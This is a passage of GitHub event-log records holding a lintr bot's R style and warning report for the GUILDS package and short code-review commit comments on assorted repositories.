seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:37:5:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L37) *style:* **Use <-, not =, for assignment.**\n```r\n​  I = (J - 1) * m / (1 - m)\n    ^\n```\n[R/expected.R:38:10:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L38) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  aux <- pm_sad(theta, I, J)\n         ^~~~~~\n```\n[R/expected.R:39:10:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L39) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  sad <- prestonsort(aux)\n         ^~~~~~~~~~~\n```\n[R/expected.R:43:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L43) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds <- function(theta, alpha_x, alpha_y,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:49:8:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L49) *warning:* **no visible global function definition for ‘draw_local’**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n       ^~~~~~~~~~\n```\n[R/expected.R:49:19:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n                 ~^~~\n```\n[R/expected.R:50:21:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L50) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:50:39:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L50) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:51:34:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:51:50:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L51) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:53:21:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:53:39:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:54:50:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:60:9:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L60) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gx <- prestonsort(meanx)\n        ^~~~~~~~~~~\n```\n[R/expected.R:61:9:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L61) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gy <- prestonsort(meany)\n        ^~~~~~~~~~~\n```\n[R/expected.R:62:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L67) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L67) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:73:18:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L73) *style:* **Commas should always have a space after.**\n```r\n​  meanx <- rep(0,Jx)\n                 ^\n```\n[R/expected.R:74:18:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L74) *style:* **Commas should always have a space after.**\n```r\n​  meany <- rep(0,Jy)\n                 ^\n```\n[R/expected.R:77:8:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L77) *warning:* **no visible global function definition for ‘draw_local_cond’**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n       ^~~~~~~~~~~~~~~\n```\n[R/expected.R:77:19:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n                 ~^~~\n```\n[R/expected.R:78:21:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L78) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:78:39:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:79:34:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:79:50:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:81:21:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L81) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:81:39:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L81) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:82:34:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:82:50:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:88:9:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L88) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gx <- prestonsort(meanx)\n        ^~~~~~~~~~~\n```\n[R/expected.R:89:9:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L89) *warning:* **no visible global function definition for ‘prestonsort’**\n```r\n​  gy <- prestonsort(meany)\n        ^~~~~~~~~~~\n```\n[R/expected.R:90:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/expected.R#L90) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:2:5:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L2) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1) {\n    ^\n```\n[R/generateData.R:6:5:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0) {\n    ^\n```\n[R/generateData.R:10:5:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L10) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y < 0) {\n    ^\n```\n[R/generateData.R:14:5:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L14) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x > 1) {\n    ^\n```\n[R/generateData.R:18:5:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L18) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y > 1) {\n    ^\n```\n[R/generateData.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:23:5:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(J < 0) {\n    ^\n```\n[R/generateData.R:32:6:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L32) *style:* **Use <-, not =, for assignment.**\n```r\n​  nx = rbeta(1, theta, theta)\n     ^\n```\n[R/generateData.R:33:6:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L33) *style:* **Use <-, not =, for assignment.**\n```r\n​  ny = 1 - nx; \n     ^\n```\n[R/generateData.R:33:15:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L33) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ny = 1 - nx; \n              ^\n```\n[R/generateData.R:36:7:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L36) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n      ^\n```\n[R/generateData.R:36:26:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                        ~^~\n```\n[R/generateData.R:36:65:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                ^\n```\n[R/generateData.R:37:7:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L37) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n      ^\n```\n[R/generateData.R:37:26:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                        ~^~\n```\n[R/generateData.R:40:3:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L40) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/generateData.R:41:5:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/generateData.R:42:12:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L42) *style:* **Use <-, not =, for assignment.**\n```r\n​     probs = exp( lgamma(J+1) - \n           ^\n```\n[R/generateData.R:42:17:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L42) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​     probs = exp( lgamma(J+1) - \n                ^\n```\n[R/generateData.R:42:27:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​     probs = exp( lgamma(J+1) - \n                         ~^~\n```\n[R/generateData.R:42:32:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L42) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs = exp( lgamma(J+1) - \n                               ^\n```\n[R/generateData.R:43:26:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L43) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (lgamma(allN + 1) + \n                         ^~~~\n```\n[R/generateData.R:43:37:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​                 (lgamma(allN + 1) + \n                                    ^\n```\n[R/generateData.R:44:30:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L44) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/generateData.R:44:42:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/generateData.R:45:19:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L45) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  allN * log(nx) + \n                  ^~~~\n```\n[R/generateData.R:45:35:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  allN * log(nx) + \n                                  ^\n```\n[R/generateData.R:46:20:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​                 (J-allN) * log(ny))\n                  ~^~\n```\n[R/generateData.R:46:21:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (J-allN) * log(ny))\n                    ^~~~\n```\n[R/generateData.R:49:11:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L49) *style:* **Use <-, not =, for assignment.**\n```r\n​    probs = polyaeggenberger(I_X, I_Y, J, allN) \n          ^\n```\n[R/generateData.R:49:13:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L49) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​    probs = polyaeggenberger(I_X, I_Y, J, allN) \n            ^~~~~~~~~~~~~~~~\n```\n[R/generateData.R:49:43:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L49) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs = polyaeggenberger(I_X, I_Y, J, allN) \n                                          ^~~~\n```\n[R/generateData.R:49:48:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​    probs = polyaeggenberger(I_X, I_Y, J, allN) \n                                               ^\n```\n[R/generateData.R:52:6:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L52) *style:* **Use <-, not =, for assignment.**\n```r\n​  NX = sample(0:J, 1, replace = TRUE, prob = probs)\n     ^\n```\n[R/generateData.R:53:6:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L53) *style:* **Use <-, not =, for assignment.**\n```r\n​  NY = J - NX\n     ^\n```\n[R/generateData.R:55:8:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L55) *style:* **Use <-, not =, for assignment.**\n```r\n​  SADX = generate.ZSM(theta, I_X, NX)\n       ^\n```\n[R/generateData.R:55:10:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L55) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  SADX = generate.ZSM(theta, I_X, NX)\n         ^~~~~~~~~~~~\n```\n[R/generateData.R:56:8:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L56) *style:* **Use <-, not =, for assignment.**\n```r\n​  SADY = generate.ZSM(theta, I_Y, NY)\n       ^\n```\n[R/generateData.R:56:10:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L56) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  SADY = generate.ZSM(theta, I_Y, NY)\n         ^~~~~~~~~~~~\n```\n[R/generateData.R:58:17:](https://github.com/thijsjanzen/GUILDS/blob/3c1b6afde5ed27a67cb8d0fbb22a91f41b6b4033/R/generateData.R#L58) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  output <- list( guildX = SADX, guildY = SADY);\n                ^\n```\n"}},"created_at":"2016-09-22T17:38:04Z"}
{"id":"4603962917","type":"CommitCommentEvent","actor":{"login":"usaAmch"},"repo":{"name":"usaAmch/ExcelTools"},"payload":{"comment":{"id":19134080,"position":null,"line":null,"path":null,"commit_id":"024eec643d101530e0f683a6b652fb2d8a62f591","created_at":"2016-09-22T17:38:29Z","updated_at":"2016-09-22T17:38:29Z","body":"You need to remove tabs and use spaces instead."}},"created_at":"2016-09-22T17:38:29Z"}
{"id":"4603963402","type":"CommitCommentEvent","actor":{"login":"Andrey1960"},"repo":{"name":"Andrey1960/gittest"},"payload":{"comment":{"id":19134081,"position":null,"line":null,"path":null,"commit_id":"20aad2946359f8281c16277baf622281c4d10ff0","created_at":"2016-09-22T17:38:35Z","updated_at":"2016-09-22T17:38:35Z","body":"Tratata"}},"created_at":"2016-09-22T17:38:35Z"}
{"id":"4603964635","type":"CommitCommentEvent","actor":{"login":"saitoha"},"repo":{"name":"akinomyoga/contra"},"payload":{"comment":{"id":19134084,"position":103,"line":619,"path":"escseq.html","commit_id":"7a64f75f4c30f7b0db4a35db2b3c4ddb5a20ee23","created_at":"2016-09-22T17:38:48Z","updated_at":"2016-09-22T17:38:48Z","body":"smExMouseUrxvt と smExMouseSgr が逆ですね"}},"created_at":"2016-09-22T17:38:48Z"}
{"id":"4603967062","type":"CommitCommentEvent","actor":{"login":"rakeen"},"repo":{"name":"Samihaamin/samihaamin.github.io"},"payload":{"comment":{"id":19134091,"position":66,"line":23,"path":"index.html","commit_id":"ad8f930501eb1c66921c76bb742819f3cf9273e7","created_at":"2016-09-22T17:39:12Z","updated_at":"2016-09-22T17:39:12Z","body":"You might want to fix that address :smiley: "}},"created_at":"2016-09-22T17:39:12Z"}
{"id":"4603968432","type":"CommitCommentEvent","actor":{"login":"usaAmch"},"repo":{"name":"usaAmch/ExcelTools"},"payload":{"comment":{"id":19134094,"position":null,"line":null,"path":null,"commit_id":"0a67ebd22121be6e0fd74773630f86104a2050dd","created_at":"2016-09-22T17:39:26Z","updated_at":"2016-09-22T17:39:26Z","body":"Don't use tabs, change them to spaces."}},"created_at":"2016-09-22T17:39:26Z"}
{"id":"4603971988","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"ChisZahkar-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19134104,"position":22,"line":22,"path":"homework_4_1.cpp","commit_id":"5edae131c5bed0224edcdd5b94bbdc42e6503398","created_at":"2016-09-22T17:40:06Z","updated_at":"2016-09-22T17:40:06Z","body":"гораздо лучше не усложнять простую и правильную реализацию функции push() на стеке, а написать \"обертку\" над push(), которая вызывает пуш в 1-й и 2-й стеки:\r\n\r\nvoid wrapPush(int a) {\r\n   push1(a);\r\n   push2(a);\r\n}"}},"created_at":"2016-09-22T17:40:06Z"}
{"id":"4603975319","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"ChisZahkar-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19134113,"position":72,"line":72,"path":"homework_4_1.cpp","commit_id":"5edae131c5bed0224edcdd5b94bbdc42e6503398","created_at":"2016-09-22T17:40:42Z","updated_at":"2016-09-22T17:40:42Z","body":"вск else-if здесь не являются вложенными, а значит не должны иметь отступы"}},"created_at":"2016-09-22T17:40:42Z"}
{"id":"4603976820","type":"CommitCommentEvent","actor":{"login":"pedrobaeza"},"repo":{"name":"OCA/e-commerce"},"payload":{"comment":{"id":19134119,"position":null,"line":null,"path":null,"commit_id":"0bca573af9856119209b8c34eff893b20b1c9099","created_at":"2016-09-22T17:40:59Z","updated_at":"2016-09-22T17:40:59Z","body":"This is not valid, as you are inserting this in another position"}},"created_at":"2016-09-22T17:40:59Z"}
{"id":"4603978256","type":"CommitCommentEvent","actor":{"login":"williewillus"},"repo":{"name":"Vazkii/Botania"},"payload":{"comment":{"id":19134126,"position":13,"line":22,"path":"src/main/java/vazkii/botania/common/network/PacketHandler.java","commit_id":"23f62609020f3f2cb3ca359f945645c39892e094","created_at":"2016-09-22T17:41:15Z","updated_at":"2016-09-22T17:41:15Z","body":"Duplicate packet id with the one above?"}},"created_at":"2016-09-22T17:41:15Z"}
{"id":"4603979890","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"ChisZahkar-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19134128,"position":117,"line":117,"path":"homework_4_4.cpp","commit_id":"5edae131c5bed0224edcdd5b94bbdc42e6503398","created_at":"2016-09-22T17:41:32Z","updated_at":"2016-09-22T17:41:32Z","body":"здесь все те же замечания"}},"created_at":"2016-09-22T17:41:32Z"}
{"id":"4603979984","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19134129,"position":null,"line":null,"path":null,"commit_id":"2f11f0defa72a264cda17629413bd0aa779eb807","created_at":"2016-09-22T17:41:33Z","updated_at":"2016-09-22T17:41:33Z","body":"Wouldn't this qualify as a simplification?"}},"created_at":"2016-09-22T17:41:33Z"}
{"id":"4603982475","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"yura-kit/python-courses"},"payload":{"comment":{"id":19134134,"position":8,"line":8,"path":"Home_Work_warm_up.py","commit_id":"732ad3c9feff19500baf24721d195dd58992fb25","created_at":"2016-09-22T17:42:01Z","updated_at":"2016-09-22T17:42:01Z","body":"I would use double qoutes to get rid of escape sequence"}},"created_at":"2016-09-22T17:42:01Z"}
{"id":"4603984005","type":"CommitCommentEvent","actor":{"login":"SebastianJay"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19134142,"position":5,"line":5,"path":"src/window_draw.py","commit_id":"83f588d3ed1f3d74a7be60df7aba5d6b512c32e3","created_at":"2016-09-22T17:42:19Z","updated_at":"2016-09-22T17:42:19Z","body":"Hmm. So there won't be an indefinite number of lists, right? -- the window is bounded by a given width and height. E.g. if width is 30 and height is 20, there are 20 rows x 30 cols = 600 characters total in the array.\r\n\r\nSo if temp is the overarching list that we return, it will contain 20 lists (one per row) which each contain 30 1-char strings (one per col). If you'd like, you can initialize such a thing prior to looping through the input list instead of appending to our return value on the fly:\r\n```\r\ntemp = [ [' ' for c in range(30)] for r in range(20) ]\r\n```\r\n\r\nThe width and height should be parameters passed into the function."}},"created_at":"2016-09-22T17:42:19Z"}
{"id":"4603986237","type":"CommitCommentEvent","actor":{"login":"mozkeeler"},"repo":{"name":"mozilla/tls-observatory"},"payload":{"comment":{"id":19134151,"position":55,"line":477,"path":"certificate/certificate.go","commit_id":"8ba16a90a8f4e3333b549e5289d0c2155b834d14","created_at":"2016-09-22T17:42:46Z","updated_at":"2016-09-22T17:42:46Z","body":"Oh, neat."}},"created_at":"2016-09-22T17:42:46Z"}
{"id":"4603986939","type":"CommitCommentEvent","actor":{"login":"RaKeerS"},"repo":{"name":"RAJKUMAR18/MyFavNETWorkTOOLS"},"payload":{"comment":{"id":19134152,"position":null,"line":null,"path":null,"commit_id":"9342250c55f66eb9fe437038e7a787826c93bd25","created_at":"2016-09-22T17:42:54Z","updated_at":"2016-09-22T17:42:54Z","body":"Now's that's a really Simple but Great Code!! Nice Work RAJKUMAR18!!! Kudos!"}},"created_at":"2016-09-22T17:42:54Z"}
{"id":"4603986952","type":"CommitCommentEvent","actor":{"login":"Andrey1960"},"repo":{"name":"Andrey1960/gittest"},"payload":{"comment":{"id":19134153,"position":null,"line":null,"path":null,"commit_id":"20aad2946359f8281c16277baf622281c4d10ff0","created_at":"2016-09-22T17:42:54Z","updated_at":"2016-09-22T17:42:54Z","body":"Hello,Hello"}},"created_at":"2016-09-22T17:42:54Z"}
{"id":"4603987204","type":"CommitCommentEvent","actor":{"login":"pabloz"},"repo":{"name":"lontivero/PyChainpoint"},"payload":{"comment":{"id":19134154,"position":46,"line":46,"path":"chainpoint.py","commit_id":"99531bdf68b7e1f67196f4c50a0bf47a92189c12","created_at":"2016-09-22T17:42:56Z","updated_at":"2016-09-22T17:42:56Z","body":"... although the `assert` is not appropriate for validation, only for sanity checks.\r\nRaise a TypeError or a custom exception instead."}},"created_at":"2016-09-22T17:42:56Z"}
